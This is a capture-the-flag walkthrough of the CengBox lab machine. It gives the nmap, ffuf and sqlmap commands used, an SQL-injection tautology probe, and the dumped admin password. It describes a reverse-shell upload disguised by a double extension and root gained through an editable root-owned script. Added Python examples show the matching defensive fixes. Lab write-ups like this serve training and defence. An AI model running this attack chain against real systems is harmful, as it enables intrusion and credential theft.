ceng-os: WALKTHROUGH

retrymp3
Published in SECARMY
4 min read, Sep 20, 2020

By retrymp3 (Instagram: @retrymp3)

Running the netdiscover command to find the machine's IP.

root@injmush:~# netdiscover

 Currently scanning: 192.168.15.0/16   |   Screen View: Unique Hosts

 14 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 840
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.8.1     5c:a8:6a:d8:13:15      4     240  HUAWEI TECHNOLOGIES CO.,LTD
 192.168.8.108   08:00:27:06:d2:43      7     420  PCS Systemtechnik GmbH
 192.168.8.102   e8:d0:fc:87:53:03      2     120  Liteon Technology Corporation
 192.168.8.100   54:b1:21:14:c0:a1      1      60  HUAWEI TECHNOLOGIES CO.,LTD

Services and port discovery

root@injmush:~/Desktop/vulnhub.vbox/cengbox1# nmap -sV -sC -T4 -oN nmap -vv 192.168.8.108

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5ESwv952eGqFVPnCkhAWI3AFXFLTEBiqTSfqvWjbrpDyTyawFvnOX+LthWfkf03mZiLbuy9R6bgvbPnrQSNmUTbA7DS3qyKgnFrt9yWYICS0w3dSsPvjFYoaqvCJdeIxdtFcYx/7sT+CbxlOMKnGhkibEUrK5Cwimnvfz2hKzf/TFXqAMaGRe86WgaxG+PsneZ75FVHGs9RoW13NTQdS7SK7ZGvcoqTrBcXfVKkUeV6SKei8B+ZdPTIcdxHO3y0q9ppchIkq1O8r3pF+9CyBUUrS4DLWVTGbRx50AJSRubM1aP7yXggRfNwJvks73v3i3b9yTcmzY3w+BXKyO2RsX

| 256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMpo8K6d/Y1jSAo6dzGCYJXvJtq4Vt7+9YItcucNoB74m9KqRGEsNw/3F8mkuIHKHfunBH6DoZE8m2gn/7XWCT0=

| 256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwn7OupbTb8M8pnpfOhzWoJ4KiLoM4bI39fNLGS7/XQ

80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: CEng Company

MAC Address: 08:00:27:06:D2:43 (Oracle VirtualBox virtual NIC)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerated port 80; nothing interesting found on the site itself.

So, on to directory brute-forcing with ffuf.

root@injmush:~/Desktop/vulnhub.vbox/cengbox1# ffuf -u http://192.168.8.108/FUZZ -w /usr/share/wordlists/dirb/big.txt -r -v

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/.htpasswd

* FUZZ: .htpasswd

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/.htaccess

* FUZZ: .htaccess

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/css

* FUZZ: css

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/img

* FUZZ: img

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/js

* FUZZ: js

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/masteradmin

* FUZZ: masteradmin

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/server-status

* FUZZ: server-status

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/uploads

* FUZZ: uploads

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/vendor

* FUZZ: vendor

Every directory is forbidden (403). Tried fuzzing for files inside each of these directories and found a login page in the masteradmin directory.

[Status: 200, Size: 0, Words: 1, Lines: 1]

| URL | http://192.168.8.108/masteradmin/db.php

* FUZZ: db.php

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/masteradmin/fonts

* FUZZ: fonts

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/masteradmin/images

* FUZZ: images

[Status: 403, Size: 278, Words: 20, Lines: 10]

| URL | http://192.168.8.108/masteradmin/js

* FUZZ: js

[Status: 200, Size: 5137, Words: 120, Lines: 108]

| URL | http://192.168.8.108/masteradmin/login.php

* FUZZ: login.php

[Status: 200, Size: 1440, Words: 171, Lines: 81]

| URL | http://192.168.8.108/masteradmin/upload.php

* FUZZ: upload.php

Played around with it and found the login page is vulnerable to SQL injection (sqli).

So,

root@injmush:~/Desktop/vulnhub.vbox/cengbox1# sqlmap -u http://192.168.1.106/masteradmin/login.php --forms --dbs --batch

--forms (because it's a login page: sqlmap parses the form and tests its fields)

--dbs (enumerate the database names)

--batch (answers sqlmap's prompts with the default answer)

Got the database name.

Now dumping all the data from it.

sqlmap -u http://192.168.1.106/masteradmin/login.php --forms -D cengbox --dump --batch

[12:31:13] [INFO] fetching columns for table 'admin' in database 'cengbox'
[12:31:13] [INFO] retrieved: 3
[12:31:16] [INFO] retrieved: id
[12:31:23] [INFO] retrieved: username
[12:31:46] [INFO] retrieved: password
[12:32:13] [INFO] fetching entries for table 'admin' in database 'cengbox'
[12:32:13] [INFO] fetching number of entries for table 'admin' in database 'cengbox'
[12:32:13] [INFO] retrieved: 1
[12:32:14] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[12:32:17] [INFO] retrieved: C3ng0v3R00T1!
[12:33:07] [INFO] retrieved: masteradmin
Database: cengbox
Table: admin
[1 entry]
+----+-------------+---------------+
| id | username    | password      |
+----+-------------+---------------+
| 1  | masteradmin | C3ng0v3R00T1! |
+----+-------------+---------------+

[12:33:39] [INFO] table 'cengbox.`admin`' dumped to CSV file '/root/.sqlmap/output/192.168.8.103/dump/cengbox/admin.csv'

Got the password, logged in, and was taken to an upload.php page.
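Before moving on to the upload step, here is what made the login page exploitable by sqlmap and how the query should have been written. This is an added example, not code from the CengBox machine or from the walkthrough: SQLite stands in for the real backend so it runs offline, the admin table mirrors the dumped cengbox.admin layout (id, username, password), and every value in it is constructed.

```python
"""Vulnerable login query beside its parameterized fix (added example; not
code from the CengBox machine). SQLite stands in for the real backend so it
runs offline; the admin table mirrors the dumped cengbox.admin layout
(id, username, password) and every value below is constructed."""
import hashlib
import hmac
import os
import sqlite3


def make_db():
    """Constructed stand-in for the cengbox database with one admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (username, password) VALUES (?, ?)",
                 ("masteradmin", "constructed-password"))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern sqlmap detects: form fields pasted into the SQL text.
    A password of  x' OR '1'='1  turns the WHERE clause into a tautology,
    so the row is returned without the real password."""
    query = ("SELECT id FROM admin WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: values travel separately from the
    statement, so quotes in the input never change its structure."""
    row = conn.execute(
        "SELECT id FROM admin WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def hash_password(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256; stores salt, iteration count and digest together.
    The dumped table held the password in clear, and it was then reused for
    su; a dump of this column hands over nothing directly reusable."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "%s$%d$%s" % (salt.hex(), iterations, digest.hex())


def verify_password(stored, candidate):
    """Recomputes the hash and compares in constant time."""
    salt_hex, iterations, digest_hex = stored.split("$")
    recomputed = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(recomputed.hex(), digest_hex)


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"
    print("vulnerable, tautology password ->", login_vulnerable(db, "masteradmin", probe))
    print("parameterized, same input      ->", login_parameterized(db, "masteradmin", probe))
```

The parameterized query removes the injection; hashing the stored password is the separate fix for the second problem the dump shows, a clear-text credential that was also valid for a system account.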

I could upload any file with a .ceng extension. So I renamed a PHP reverse shell, appending .ceng to its name, and uploaded it.

Started a netcat listener, then browsed to the uploads folder on the website and opened the uploaded file.

Now I got a shell.
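The upload check only looked at the last extension, which is why appending .ceng to shell.php was enough. The following is an added example, not the machine's upload.php: it shows that last-extension check beside a stricter validator that accepts exactly one allow-listed extension, ignores any client-supplied path, and picks the stored name itself. The allowed extension (ceng), the function names and the 0o640 file mode are assumptions.

```python
"""Upload-name validation: the last-extension check the walkthrough gets past
by renaming shell.php to shell.php.ceng, beside a stricter validator that
chooses the stored name itself (added example; not the machine's upload.php).
The allow-list, function names and file mode are assumptions."""
import os
import re
import secrets
import tempfile

ALLOWED_EXTENSIONS = {"ceng"}          # assumed allow-list, as in the walkthrough
STEM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def naive_allowed(filename):
    """What a last-extension-only check accepts: 'shell.php.ceng' passes."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def safe_stored_name(filename):
    """Returns a server-chosen name for the file, or None to reject it.
    Exactly one extension is allowed, so a name carrying a second extension
    such as .php is refused no matter where it sits; the stem must be plain
    ASCII; directory components are dropped; the stored name is random."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) != 2:
        return None
    stem, ext = parts[0], parts[1].lower()
    if not STEM_RE.fullmatch(stem) or ext not in ALLOWED_EXTENSIONS:
        return None
    return "%s.%s" % (secrets.token_hex(16), ext)


def save_upload(data, filename, upload_dir):
    """Writes the upload under its server-chosen name with O_EXCL (no
    overwrite) and a non-executable mode; returns the path or None."""
    stored = safe_stored_name(filename)
    if stored is None:
        return None
    path = os.path.join(upload_dir, stored)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    for name in ("report.ceng", "shell.php.ceng", "shell.ceng.php", "../x.ceng"):
        print("%-16s naive=%-5s strict=%s" % (name, naive_allowed(name), safe_stored_name(name)))
    with tempfile.TemporaryDirectory() as d:
        print(save_upload(b"constructed bytes", "report.ceng", d))
```

The name check only stops this rename trick; the other half of the fix is serving uploads from a directory where the web server has script execution disabled, or from outside the web root entirely, so that whatever gets stored is never run as code.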

Spawning a Python pty to make the shell interactive.

python -c 'import pty; pty.spawn("/bin/bash")'

Found there was a user named cengover, so I tried su cengover with the password found from the SQLi.

Now I got a shell as user cengover.

Checking around the machine, I found a hidden process running by executing the LinEnum.sh script, which I downloaded using wget.

The running process was a Python script owned by root but executable (and editable) by anyone. So I included a reverse shell inside the script and executed it after starting a netcat listener in another terminal. Now I got a root shell.
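The root step hinged on a root-owned script that any user could modify, which is exactly the kind of finding LinEnum lists. The scanner below is an added example, not LinEnum's code: it walks a tree and reports regular files that belong to one user (root by default) but are world- or group-writable, skipping symlinks. Its self-test builds a constructed temporary tree with three permission cases and checks against the current user, since a test cannot create root-owned files.

```python
"""Finds files owned by one user that other users can modify: the condition
behind the walkthrough's root step (a root-owned script any user could edit).
Added example, not LinEnum's code; owner_uid defaults to root and the
self-test uses the current user on a constructed temporary tree."""
import os
import stat
import tempfile


def find_writable_by_others(root, owner_uid=0):
    """Returns sorted (path, how) pairs for regular files under root that
    belong to owner_uid and are world- or group-writable. Symlinks and
    special files are skipped; unreadable entries are ignored."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue                       # vanished or unreadable
            if not stat.S_ISREG(st.st_mode) or st.st_uid != owner_uid:
                continue
            if st.st_mode & stat.S_IWOTH:
                hits.append((path, "world-writable"))
            elif st.st_mode & stat.S_IWGRP:
                hits.append((path, "group-writable"))
    return sorted(hits)


def self_test():
    """Builds a constructed tree with three permission cases and returns the
    labels the scanner reports, keyed by file name."""
    with tempfile.TemporaryDirectory() as d:
        cases = (("loose.py", 0o666), ("group.py", 0o664), ("tight.py", 0o644))
        for name, mode in cases:
            path = os.path.join(d, name)
            with open(path, "w") as fh:
                fh.write("# constructed placeholder script\n")
            os.chmod(path, mode)
        hits = find_writable_by_others(d, owner_uid=os.getuid())
        return {os.path.basename(p): how for p, how in hits}


if __name__ == "__main__":
    print(self_test())
    # Root-owned files under /etc that others can write to (normally none).
    for path, how in find_writable_by_others("/etc"):
        print(how, path)
```

Group-writable files matter as much as world-writable ones when the unprivileged account is in that group, which is why both are reported; a hit on a script that a cron job or service runs as root is the finding to fix, by removing the write bit and, if the script must be edited by others, copying it into a root-only location before it is scheduled.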

cat ~/flag.txt
